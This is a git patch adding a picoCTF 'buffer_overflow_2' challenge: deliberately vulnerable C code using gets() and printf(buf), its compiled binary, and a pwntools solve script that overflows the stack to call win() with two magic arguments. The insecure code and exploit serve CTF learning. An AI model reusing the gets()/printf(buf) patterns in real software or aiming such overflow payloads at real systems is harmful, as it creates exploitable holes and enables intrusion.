From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 19:46:13 +0200 Subject: [PATCH] pwn/buffer_overflow_2 --- pwn/buffer_overflow_2/solve.py | 31 ++++++++++++++++++++++++ pwn/buffer_overflow_2/vuln | Bin 0 -> 15808 bytes pwn/buffer_overflow_2/vuln.c | 43 +++++++++++++++++++++++++++++++++ 3 files changed, 74 insertions(+) create mode 100755 pwn/buffer_overflow_2/solve.py create mode 100755 pwn/buffer_overflow_2/vuln create mode 100644 pwn/buffer_overflow_2/vuln.c diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py new file mode 100755 index 0000000..b3dab5e --- /dev/null +++ b/pwn/buffer_overflow_2/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 55214".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + print(r.recvuntil(b"Please enter your string:")) + offset = 112 # found with pwndbg + payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D) + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa GIT binary patch literal 15808 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 +#include +#include +#include +#include + +#define BUFSIZE 100 +#define FLAGSIZE 64 + +void win(unsigned int arg1, unsigned int arg2) { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + if (arg1 != 0xCAFEF00D) + return; + if (arg2 != 0xF00DF00D) + return; + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + puts(buf); +} + +int main(int argc, char **argv){ + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +